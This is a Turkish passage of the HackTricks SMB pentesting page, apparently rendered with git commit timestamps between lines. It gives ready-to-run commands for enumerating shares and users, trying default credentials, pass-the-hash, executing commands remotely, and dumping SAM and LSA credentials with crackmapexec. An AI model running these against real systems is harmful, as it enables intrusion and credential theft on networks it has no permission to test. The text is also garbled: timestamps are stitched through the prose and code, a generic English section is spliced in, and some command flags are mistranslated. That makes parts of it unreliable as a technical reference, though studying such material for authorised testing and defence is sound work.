2024-02-10 18:14:16 +00:00
# 139,445 - SMB Pentesting
2022-04-28 16:01:33 +00:00
< details >
2024-02-23 16:46:32 +00:00
< summary > < strong > AWS hacklemeyi sı fı rdan kahramana öğrenin< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Kı rmı zı Takı m Uzmanı )< / strong > < / a > < strong > ile!< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-10 18:14:16 +00:00
HackTricks'ı desteklemenin diğer yolları :
2024-01-02 18:28:27 +00:00
2024-02-23 16:46:32 +00:00
* **Şirketinizi HackTricks'te reklamı nı görmek istiyorsanı z** veya **HackTricks'i PDF olarak indirmek istiyorsanı z** [**ABONELİK PLANLARI**]'na göz atı n (https://github.com/sponsors/carlospolop)!
* [**Resmi PEASS & HackTricks ürünleri**]'ni edinin (https://peass.creator-spring.com)
* [**PEASS Ailesi**]'ni keşfedin (https://opensea.io/collection/the-peass-family), özel [**NFT'ler**]'imiz koleksiyonunu keşfedin (https://opensea.io/collection/the-peass-family)
* **Katı lı n** 💬 [**Discord grubuna** ](https://discord.gg/hRep4RUj7f ) veya [**telegram grubuna** ](https://t.me/peass ) veya bizi **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )** takip edin.**
* **Hacking püf noktaları nı zı paylaşarak PR'lar göndererek** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) ve [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github depoları na katkı da bulunun.
2022-04-28 16:01:33 +00:00
< / details >
2022-05-01 13:25:53 +00:00
## **Port 139**
2020-07-15 15:43:14 +00:00
2024-02-23 16:46:32 +00:00
_**Ağ Temel Giriş/Çı kı ş Sistemi (NetBIOS)**_, yerel ağdaki (LAN) uygulamaları n, PC'lerin ve Masaüstülerin ağ donanı mı yla etkileşim kurması nı ve **veri iletimini kolaylaştı rmayı amaçlayan bir yazı lı m protokolüdür** . NetBIOS ağı üzerinde çalı şan yazı lı m uygulamaları nı n tanı mlanması ve konumlandı rı lması , genellikle bilgisayar adı ndan farklı olan ve en fazla 16 karakter uzunluğunda olabilen NetBIOS adları aracı lı ğı yla gerçekleştirilir. İki uygulama arası nda bir NetBIOS oturumu, bir uygulama (istemci olarak hareket eden) diğer bir uygulamayı (sunucu olarak hareket eden) "çağı rmak" için bir komut verdiğinde başlatı lı r ve bunun için **TCP Port 139** kullanı lı r.
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
```
2022-05-01 13:25:53 +00:00
## Port 445
2020-07-15 15:43:14 +00:00
2024-02-23 16:46:32 +00:00
Teknik olarak, Port 139 'NBT üzerinden IP' olarak adlandı rı lı rken, Port 445 'IP üzerinden SMB' olarak tanı mlanmaktadı r. **SMB** kı saltması , aynı zamanda **Common Internet File System (CIFS)** olarak da bilinen 'Server Message Blocks' anlamı na gelir. Uygulama katmanı ağ protokolü olarak, SMB/CIFS genellikle dosyalara, yazı cı lara, seri portlara paylaşı lan erişimi sağlamak ve ağdaki düğümler arası nda çeşitli iletişim biçimlerini kolaylaştı rmak için kullanı lı r.
2020-07-15 15:43:14 +00:00
2024-02-23 16:46:32 +00:00
Örneğin, Windows bağlamı nda, SMB'nin doğrudan TCP/IP üzerinden çalı şabileceği ve NetBIOS üzerinden TCP/IP'nin gerekli olmadı ğı , port 445'in kullanı mı yla vurgulanmaktadı r. Bunun aksine, farklı sistemlerde, port 139'un kullanı ldı ğı ve SMB'nin NetBIOS üzerinden TCP/IP ile birlikte yürütüldüğü gözlemlenmektedir.
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
```
2022-10-02 19:15:35 +00:00
### SMB
2024-02-23 16:46:32 +00:00
**Sunucu İleti Bloğu (SMB)** protokolü, bir **istemci-sunucu** modelinde çalı şarak **dosyalara** , dizinlere ve yazı cı lar ile yönlendiriciler gibi diğer ağ kaynakları na erişimi düzenlemek için tasarlanmı ştı r. Başlı ca olarak **Windows** işletim sistemi serisinde kullanı lan SMB, geriye dönük uyumluluğu sağlayarak, Microsoft'un daha yeni sürümlerini kullanan cihazları n eski sürümleri çalı ştı ranlarla sorunsuz etkileşimde bulunması nı sağlar. Ayrı ca, **Samba** projesi ücretsiz bir yazı lı m çözümü sunarak, SMB'nin **Linux** ve Unix sistemlerinde uygulanması nı sağlar ve böylece SMB aracı lı ğı yla çapraz platform iletişimini kolaylaştı rı r.
2022-10-02 19:15:35 +00:00
2024-02-23 16:46:32 +00:00
Paylaşı mlar, **yerel dosya sisteminin keyfi parçaları nı ** temsil ederek, bir SMB sunucusu tarafı ndan sağlanabilir ve hiyerarşiyi sunucunun gerçek yapı sı ndan kı smen **bağı msı z** olarak istemciye görünür kı lar. **Erişim Kontrol Listeleri (ACL'ler)** , **erişim hakları nı ** tanı mlayarak, ** `yürütme` **, ** `okuma` ** ve ** `tam erişim` ** gibi özellikler de dahil olmak üzere kullanı cı izinleri üzerinde **detaylı kontrol** sağlar. Bu izinler paylaşı mlara dayalı olarak bireysel kullanı cı lara veya gruplara atanabilir ve sunucuda belirlenen yerel izinlerden farklı dı r.
2022-10-02 19:15:35 +00:00
2024-02-10 18:14:16 +00:00
### IPC$ Paylaşı mı
2020-07-15 15:43:14 +00:00
2024-02-23 16:46:32 +00:00
IPC$ paylaşı mı na anonim bir boş oturum aracı lı ğı yla erişim sağlanabilir ve bu da adlandı rı lmı ş borular aracı lı ğı yla sunulan hizmetlerle etkileşime olanak tanı r. Bu amaçla `enum4linux` aracı kullanı şlı dı r. Doğru bir şekilde kullanı ldı ğı nda, aşağı dakilerin elde edilmesini sağlar:
2020-07-15 15:43:14 +00:00
2024-02-23 16:46:32 +00:00
* İşletim sistemi hakkı nda bilgi
* Üst etki alanı hakkı nda detaylar
* Yerel kullanı cı lar ve grupları n derlenmesi
* Kullanı labilir SMB paylaşı mları hakkı nda bilgi
* Etkili sistem güvenlik politikası
2024-02-05 02:28:59 +00:00
2024-02-23 16:46:32 +00:00
Bu işlevsellik, ağ yöneticileri ve güvenlik uzmanları nı n ağdaki SMB (Sunucu İleti Bloğu) hizmetlerinin güvenlik durumunu değerlendirmesi için kritiktir. `enum4linux` , hedef sistemin SMB ortamı nı n kapsamlı bir görünümünü sağlar ve potansiyel zayı flı kları belirlemek ve SMB hizmetlerinin uygun şekilde güvence altı na alı ndı ğı ndan emin olmak için esastı r.
2024-02-05 02:28:59 +00:00
```bash
enum4linux -a target_ip
```
2024-02-23 16:46:32 +00:00
Yukarı daki komut, `enum4linux` 'un `target_ip` tarafı ndan belirtilen hedefe karşı tam bir numaralandı rma gerçekleştirmek için nası l kullanı labileceğinin bir örneğidir.
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
## NTLM Nedir
2020-07-15 15:43:14 +00:00
2024-02-23 16:46:32 +00:00
NTLM'nin ne olduğunu bilmiyorsanı z veya nası l çalı ştı ğı nı ve nası l kötüye kullanı labileceğini öğrenmek istiyorsanı z, **NTLM** hakkı nda çok ilginç bulacağı nı z bu sayfada **bu protokolün nası l çalı ştı ğı ve nası l bundan faydalanabileceğiniz açı klanmı ştı r:**
2020-07-15 15:43:14 +00:00
2022-10-04 23:49:59 +00:00
{% content-ref url="../windows-hardening/ntlm/" %}
[ntlm ](../windows-hardening/ntlm/ )
{% endcontent-ref %}
2024-02-10 18:14:16 +00:00
## **Sunucu Numaralandı rma**
2020-07-15 15:43:14 +00:00
2024-02-23 16:46:32 +00:00
### Bir ağı tarayarak ana bilgisayarları arayı n:
2020-07-15 15:43:14 +00:00
```bash
nbtscan -r 192.168.0.1/24
```
2024-02-10 18:14:16 +00:00
### SMB sunucu sürümü
2020-07-15 15:43:14 +00:00
2024-02-23 16:46:32 +00:00
SMB sürümüne yönelik olası zafiyetleri aramak için kullanı lan sürümün bilinmesi önemlidir. Bu bilgi diğer kullanı lan araçlarda görünmüyorsa, şunları yapabilirsiniz:
2020-07-15 15:43:14 +00:00
2024-02-23 16:46:32 +00:00
* **MSF** yardı mcı modülü olan _**auxiliary/scanner/smb/smb\_version**_ kullanı n
2024-02-10 18:14:16 +00:00
* Veya bu betiği kullanı n:
2020-07-15 15:43:14 +00:00
```bash
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" & & exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" & & sleep .1
```
2024-02-23 16:46:32 +00:00
### **Exploit ara**
2020-07-15 15:43:14 +00:00
```bash
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
```
2024-02-23 16:46:32 +00:00
### **Olası ** Kimlik Bilgileri
2020-07-15 15:43:14 +00:00
2024-02-23 16:46:32 +00:00
| **Kullanı cı Ad(lar)ı ** | **Yaygı n şifreler** |
| ---------------------- | ---------------------------------------- |
| _(boş)_ | _(boş)_ |
| guest | _(boş)_ |
| Administrator, admin | _(boş)_ , password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |
2020-07-15 15:43:14 +00:00
2024-02-23 16:46:32 +00:00
### Kaba Kuvvet Saldı rı sı
2023-12-26 20:51:20 +00:00
2024-02-23 16:46:32 +00:00
* [**SMB Kaba Kuvvet Saldı rı sı ** ](../generic-methodologies-and-resources/brute-force.md#smb )
2023-12-26 20:51:20 +00:00
2024-02-23 16:46:32 +00:00
### SMB Ortamı Bilgileri
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
### Bilgi Edinme
2020-07-15 15:43:14 +00:00
```bash
#Dump interesting information
enum4linux -a [-u "< username > " -p "< passwd > "] < IP >
2021-06-16 12:07:22 +00:00
enum4linux-ng -A [-u "< username > " -p "< passwd > "] < IP >
2020-07-15 15:43:14 +00:00
nmap --script "safe or smb-enum-*" -p 445 < IP >
#Connect to the rpc
rpcclient -U "" -N < IP > #No creds
2020-12-22 11:59:42 +00:00
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
2022-11-26 22:36:18 +00:00
rpcclient -U "username%passwd" < IP > #With creds
2020-07-15 15:43:14 +00:00
#You can use querydispinfo and enumdomusers to query user information
#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]< targetName or address >
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]< targetName or address >
#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]< targetName or address >
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]< targetName or address >
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]< targetName or address >
```
2024-02-23 16:46:32 +00:00
### Kullanı cı ları , Grupları ve Oturum Açmı ş Kullanı cı ları Sı rala
2020-07-15 15:43:14 +00:00
2024-02-23 16:46:32 +00:00
Bu bilgiler zaten enum4linux ve enum4linux-ng ile toplanmı ş olmalı dı r.
2023-08-08 09:05:26 +00:00
```bash
2022-10-04 23:49:59 +00:00
crackmapexec smb 10.10.10.10 --users [-u < username > -p < password > ]
crackmapexec smb 10.10.10.10 --groups [-u < username > -p < password > ]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u < username > -p < password > ]
2020-07-15 15:43:14 +00:00
2022-10-04 21:36:29 +00:00
ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(& (objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "
2020-07-15 15:43:14 +00:00
2022-10-04 21:36:29 +00:00
rpcclient -U "" -N 10.10.10.10
enumdomusers
2022-10-04 23:49:59 +00:00
enumdomgroups
2023-08-08 09:05:26 +00:00
```
2024-02-23 16:46:32 +00:00
### Yerel kullanı cı ları sı rala
2023-11-27 16:58:23 +00:00
2023-08-08 09:05:26 +00:00
[Impacket ](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py )
```bash
2022-10-04 23:49:59 +00:00
lookupsid.py -no-pass hostname.local
2023-08-08 09:05:26 +00:00
```
2024-02-23 16:46:32 +00:00
Tek Satı r
2023-08-08 09:05:26 +00:00
```bash
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
```
2024-02-23 16:46:32 +00:00
### Metasploit - Yerel kullanı cı ları sı rala
2023-12-26 20:51:20 +00:00
```bash
2022-10-04 23:49:59 +00:00
use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run
2022-10-04 21:36:29 +00:00
```
2024-02-23 16:46:32 +00:00
### **LSARPC ve SAMR rpcclient'ı Numaralandı rma**
2020-07-15 15:43:14 +00:00
2022-10-04 23:18:19 +00:00
{% content-ref url="pentesting-smb/rpcclient-enumeration.md" %}
[rpcclient-enumeration.md ](pentesting-smb/rpcclient-enumeration.md )
2022-10-04 21:36:29 +00:00
{% endcontent-ref %}
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
### Linux'tan GUI bağlantı sı
2021-02-02 09:11:43 +00:00
2024-02-10 18:14:16 +00:00
#### Terminalde:
2021-02-02 09:11:43 +00:00
`xdg-open smb://cascade.htb/`
2024-02-10 18:14:16 +00:00
#### Dosya tarayı cı penceresinde (nautilus, thunar, vb.)
2021-02-02 09:11:43 +00:00
`smb://friendzone.htb/general/`
2024-02-10 18:14:16 +00:00
## Paylaşı lan Klasörlerin Numaralandı rı lması
2020-07-15 15:43:14 +00:00
2024-02-10 18:14:16 +00:00
### Paylaşı lan klasörleri listeleme
2020-07-15 15:43:14 +00:00
2024-02-23 16:46:32 +00:00
Her zaman erişebileceğiniz bir şey olup olmadı ğı nı kontrol etmeniz önerilir, kimlik bilgileriniz yoksa **null** **kimlik bilgileri/misafir kullanı cı sı ** kullanmayı deneyin.
2020-07-15 15:43:14 +00:00
```bash
smbclient --no-pass -L //< IP > # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //< IP > #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
2022-10-04 23:49:59 +00:00
2020-07-15 15:43:14 +00:00
smbmap -H < IP > [-P < PORT > ] #Null user
smbmap -u "username" -p "password" -H < IP > [-P < PORT > ] #Creds
smbmap -u "username" -p "< NT > :< LM > " -H < IP > [-P < PORT > ] #Pass -the-Hash
2022-10-04 23:49:59 +00:00
smbmap -R -u "username" -p "password" -H < IP > [-P < PORT > ] #Recursive list
2020-07-15 15:43:14 +00:00
crackmapexec smb < IP > -u '' -p '' --shares #Null user
crackmapexec smb < IP > -u 'username' -p 'password' --shares #Guest user
2020-09-20 21:41:33 +00:00
crackmapexec smb < IP > -u 'username' -H '< HASH > ' --shares #Guest user
2020-07-15 15:43:14 +00:00
```
2024-02-23 16:46:32 +00:00
### **Paylaşı lan bir klasöre bağlanma/Listeleme**
2020-07-15 15:43:14 +00:00
```bash
#Connect using smbclient
smbclient --no-pass //< IP > /< Folder >
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //< IP > #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient
#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H < IP > [-P < PORT > ] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H < IP > [-P < PORT > ] # Non-Recursive list
smbmap -u "username" -p "< NT > :< LM > " [-r/-R] [Folder] -H < IP > [-P < PORT > ] #Pass -the-Hash
```
2024-02-23 16:46:32 +00:00
### **Windows paylaşı mları nı manuel olarak sı ralayı n ve bağlanı n**
2020-07-15 15:43:14 +00:00
2024-02-23 16:46:32 +00:00
Makine ana bilgisayarı nı n paylaşı mları nı görüntüleme konusunda kı sı tlı olabileceğiniz ve onları listelemeye çalı ştı ğı nı zda bağlanabileceğiniz herhangi bir paylaşı mı n olmadı ğı görünebileceği olası dı r. Bu nedenle, bir paylaşı ma manuel olarak bağlanmayı denemek faydalı olabilir. Paylaşı mları manuel olarak sı ralamak için geçerli bir oturum (örneğin, boş oturum veya geçerli kimlik bilgileri) kullanı rken NT\_STATUS\_ACCESS\_DENIED ve NT\_STATUS\_BAD\_NETWORK\_NAME gibi yanı tları aramak isteyebilirsiniz. Bu yanı tlar, paylaşı mı n var olup olmadı ğı nı ve erişiminizin olup olmadı ğı nı veya paylaşı mı n hiç var olmadı ğı nı gösterebilir.
2020-08-28 15:29:16 +00:00
2024-02-10 18:14:16 +00:00
Windows hedefleri için yaygı n paylaşı m adları şunlardı r:
2020-08-28 15:29:16 +00:00
* C$
* D$
* ADMIN$
* IPC$
* PRINT$
* FAX$
* SYSVOL
* NETLOGON
2024-02-23 16:46:32 +00:00
(Yaygı n paylaşı m adları _**Network Security Assessment 3. baskı **_ kitabı ndan alı nmı ştı r)
2020-08-28 15:29:16 +00:00
2024-02-23 16:46:32 +00:00
Onlara aşağı daki komutu kullanarak bağlanmayı deneyebilirsiniz
2020-08-28 15:29:16 +00:00
```bash
smbclient -U '%' -N \\\\< IP > \\< SHARE > # null session to connect to a windows share
smbclient -U '< USER > ' \\\\< IP > \\< SHARE > # authenticated session to connect to a windows share (you will be prompted for a password)
```
2024-02-23 16:46:32 +00:00
veya bu betik (bir boş oturum kullanarak)
2020-08-28 15:29:16 +00:00
```bash
#/bin/bash
2020-08-28 16:23:05 +00:00
ip='< TARGET-IP-HERE > '
2020-08-28 15:29:16 +00:00
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')
for share in ${shares[*]}; do
2024-02-10 18:14:16 +00:00
output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')
2020-08-28 15:29:16 +00:00
2024-02-10 18:14:16 +00:00
if [[ -z $output ]]; then
echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
else
echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
fi
2020-08-28 15:29:16 +00:00
done
```
2024-02-23 16:46:32 +00:00
# SMB Pentesting
2024-02-10 18:14:16 +00:00
2024-02-23 16:46:32 +00:00
## SMB Enumeration
2024-02-10 18:14:16 +00:00
2024-02-23 16:46:32 +00:00
### Nmap
2024-02-10 18:14:16 +00:00
2024-02-23 16:46:32 +00:00
Use Nmap to discover open SMB ports:
2024-02-10 18:14:16 +00:00
```bash
2024-02-23 16:46:32 +00:00
nmap -p 139,445 < target >
2024-02-10 18:14:16 +00:00
```
2024-02-23 16:46:32 +00:00
### Enum4linux
2024-02-10 18:14:16 +00:00
2024-02-23 16:46:32 +00:00
Use Enum4linux to gather information about the target SMB server:
2024-02-10 18:14:16 +00:00
```bash
2024-02-23 16:46:32 +00:00
enum4linux < target >
2024-02-10 18:14:16 +00:00
```
2024-02-23 16:46:32 +00:00
### SMBclient
2024-02-10 18:14:16 +00:00
2024-02-23 16:46:32 +00:00
Connect to an SMB server using SMBclient:
2024-02-10 18:14:16 +00:00
```bash
2024-02-23 16:46:32 +00:00
smbclient //< target > /share
2024-02-10 18:14:16 +00:00
```
2024-02-23 16:46:32 +00:00
## SMB Exploitation
### Metasploit
2024-02-10 18:14:16 +00:00
2024-02-23 16:46:32 +00:00
Use Metasploit to exploit SMB vulnerabilities:
2024-02-10 18:14:16 +00:00
```bash
2024-02-23 16:46:32 +00:00
use exploit/windows/smb/< exploit >
2024-02-10 18:14:16 +00:00
```
2024-02-23 16:46:32 +00:00
### Impacket
2024-02-10 18:14:16 +00:00
2024-02-23 16:46:32 +00:00
Use Impacket tools like `smbclient.py` for SMB exploitation:
2024-02-10 18:14:16 +00:00
```bash
2024-02-23 16:46:32 +00:00
smbclient.py < target >
2024-02-10 18:14:16 +00:00
```
2024-02-23 16:46:32 +00:00
## SMB Post-Exploitation
2024-02-10 18:14:16 +00:00
2024-02-23 16:46:32 +00:00
### Mimikatz
Use Mimikatz to extract credentials from the target system:
2024-02-10 18:14:16 +00:00
```bash
2024-02-23 16:46:32 +00:00
mimikatz
2024-02-10 18:14:16 +00:00
```
2024-02-23 16:46:32 +00:00
### CrackMapExec
2020-08-28 15:29:16 +00:00
2024-02-23 16:46:32 +00:00
Use CrackMapExec for post-exploitation tasks on SMB:
2020-08-28 15:29:16 +00:00
2024-02-10 18:14:16 +00:00
```bash
2024-02-23 16:46:32 +00:00
crackmapexec smb < target >
2024-02-10 18:14:16 +00:00
```
2020-08-28 15:29:16 +00:00
```bash
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
```
2024-02-10 18:14:16 +00:00
### **Windows'tan paylaşı mları sı ralama / üçüncü taraf araçları olmadan**
2023-11-27 16:58:23 +00:00
PowerShell
```powershell
# Retrieves the SMB shares on the locale computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer.
get-smbshare -CimSession "< computer name or session object > "
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection
```
2024-02-10 18:14:16 +00:00
CMD konsolu
2023-11-27 16:58:23 +00:00
```shell
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\< ip > /all
```
2024-02-23 16:46:32 +00:00
### MMC Snap-in (grafiksel)
MMC Snap-in, Microsoft Management Console (MMC) içinde çalı şan bir eklentidir. Bu grafik arayüzü, yöneticilerin sistem yapı landı rması nı ve denetimini kolaylaştı rmak için kullanı lı r.
2023-11-27 16:58:23 +00:00
```shell
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
```
2024-02-23 16:46:32 +00:00
explorer.exe (grafiksel), mevcut gizli olmayan paylaşı mları görmek için `\\<ip>\` adresine girin.
2023-11-27 16:58:23 +00:00
2024-02-23 16:46:32 +00:00
### Bir paylaşı lan klasörü bağlama
2020-07-15 15:43:14 +00:00
```bash
2020-11-28 15:52:16 +00:00
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
2020-07-15 15:43:14 +00:00
```
2024-02-10 18:14:16 +00:00
### **Dosyaları İndirme**
2020-07-15 15:43:14 +00:00
2024-02-23 16:46:32 +00:00
Kimlik bilgileri/Pass-the-Hash ile bağlantı kurmayı öğrenmek için önceki bölümleri okuyun.
2020-07-15 15:43:14 +00:00
```bash
#Search a file and download
sudo smbmap -R Folder -H < IP > -A < FileName > -q # Search the file in recursive mode and download it inside /usr/share/smbmap
```
```bash
#Download all
smbclient //< IP > /< share >
2020-09-03 15:27:18 +00:00
> mask ""
2020-09-04 19:43:20 +00:00
> recurse
> prompt
2020-07-15 15:43:14 +00:00
> mget *
#Download everything to current directory
```
2024-02-23 16:46:32 +00:00
### Alan Paylaşı lan Klasörler Arama
2020-12-22 15:40:31 +00:00
2023-12-26 20:51:20 +00:00
* [**Snaffler** ](https://github.com/SnaffCon/Snaffler )\*\*\*\*
2022-10-05 00:11:28 +00:00
```bash
Snaffler.exe -s -d domain.local -o snaffler.log -v data
```
2024-02-10 18:14:16 +00:00
* [**CrackMapExec** ](https://wiki.porchetta.industries/smb-protocol/spidering-shares ) örümcek.
2024-02-23 16:46:32 +00:00
* `-M örümcek_artı [--paylaşı m <paylaşı m_adı >]`
* `--desen txt`
2020-12-22 15:40:31 +00:00
```bash
2022-10-04 23:49:59 +00:00
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
2020-12-22 15:40:31 +00:00
```
2024-02-23 16:46:32 +00:00
Özellikle paylaşı mlardan ilginç olanlar, Grup İlkesi aracı lı ğı yla oturum açma işlemi yapı landı rı lmı ş kullanı cı lar için **şifreler içerebilecek** olan ** `Registry.xml` ** dosyaları dı r. Veya kimlik bilgilerini içeren ** `web.config` ** dosyaları .
2022-10-05 23:14:39 +00:00
{% hint style="info" %}
2024-02-23 16:46:32 +00:00
**SYSVOL paylaşı mı **, etki alanı ndaki tüm kimlik doğrulama yapı lmı ş kullanı cı lar tarafı ndan **okunabilir** . Orada birçok farklı toplu iş, VBScript ve PowerShell **betiği bulabilirsiniz** .\
İçindeki **betikleri kontrol etmelisiniz** çünkü **şifreler** gibi hassas bilgiler **bulabilirsiniz** .
2022-10-05 23:14:39 +00:00
{% endhint %}
2024-02-23 16:46:32 +00:00
## Registry'i Oku
2021-05-10 16:48:27 +00:00
2024-02-23 16:46:32 +00:00
Bazı keşfedilmiş kimlik bilgilerini kullanarak **registry'yi okuyabilirsiniz** . Impacket ** `reg.py` ** kullanarak deneyebilirsiniz:
2022-10-04 23:49:59 +00:00
```bash
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
2021-05-10 16:48:27 +00:00
```
2024-02-23 16:46:32 +00:00
## Saldı rı Sonrası İşlemler
2021-05-10 16:48:27 +00:00
2024-02-23 16:46:32 +00:00
Bir **Samba** sunucusunun varsayı lan yapı landı rması genellikle `/etc/samba/smb.conf` konumunda bulunur ve bazı **tehlikeli yapı landı rmalara** sahip olabilir:
2022-10-02 19:15:35 +00:00
2024-02-23 16:46:32 +00:00
| **Ayar** | **Açı klama** |
2022-10-02 19:15:35 +00:00
| --------------------------- | ------------------------------------------------------------------- |
2024-02-23 16:46:32 +00:00
| `browseable = yes` | Mevcut paylaşı mları listelemeye izin verir mi? |
| `read only = no` | Dosyaları n oluşturulması nı ve değiştirilmesini yasaklar mı ? |
2024-02-10 18:14:16 +00:00
| `writable = yes` | Kullanı cı ları n dosya oluşturması na ve değiştirmesine izin verir mi? |
2024-02-23 16:46:32 +00:00
| `guest ok = yes` | Şifre kullanmadan hizmete bağlanmaya izin verir mi? |
| `enable privileges = yes` | Belirli SID'lere atanan ayrı calı kları onaylar mı ? |
| `create mask = 0777` | Yeni oluşturulan dosyalara hangi izinler atanmalı dı r? |
| `directory mask = 0777` | Yeni oluşturulan dizinlere hangi izinler atanmalı dı r? |
| `logon script = script.sh` | Kullanı cı nı n oturum açtı ğı nda hangi betiğin çalı ştı rı lması gerekiyor?|
| `magic script = script.sh` | Betiğin kapatı ldı ğı nda hangi betiğin çalı ştı rı lması gerekiyor? |
| `magic output = script.out` | Sihirli betiğin çı ktı sı nı n nerede saklanması gerekiyor? |
2024-02-10 18:14:16 +00:00
2024-02-23 16:46:32 +00:00
`smbstatus` komutu **sunucu** ve **kimin bağlı olduğu** hakkı nda bilgi verir.
2024-02-10 18:14:16 +00:00
2024-02-23 16:46:32 +00:00
## Kerberos Kullanarak Kimlik Doğrulama
2024-02-10 18:14:16 +00:00
2024-02-23 16:46:32 +00:00
**Smbclient** ve **rpcclient** araçları nı kullanarak **kerberos** üzerinden kimlik doğrulaması yapabilirsiniz:
2020-07-15 15:43:14 +00:00
```bash
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
```
2024-02-10 18:14:16 +00:00
## **Komutları Yürütme**
2020-07-15 15:43:14 +00:00
2022-05-01 13:25:53 +00:00
### **crackmapexec**
2020-07-15 15:43:14 +00:00
2024-02-23 16:46:32 +00:00
crackmapexec, **mmcexec, smbexec, atexec, wmiexec** 'ten herhangi birini **kötüye kullanarak** komutları yürütebilir, varsayı lan yöntemin **wmiexec** olduğunu belirtebilirsiniz. Kullanmak istediğiniz seçeneği belirtebilirsiniz `--exec-method` parametresiyle:
2020-07-15 15:43:14 +00:00
```bash
apt-get install crackmapexec
2020-09-20 21:41:33 +00:00
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H < NTHASH > -x whoami #Pass -the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --sessions #Get sessions (
crackmapexec smb < IP > -d < DOMAIN > -u Administrator -p 'password' --loggedon-users #Get logged-on users
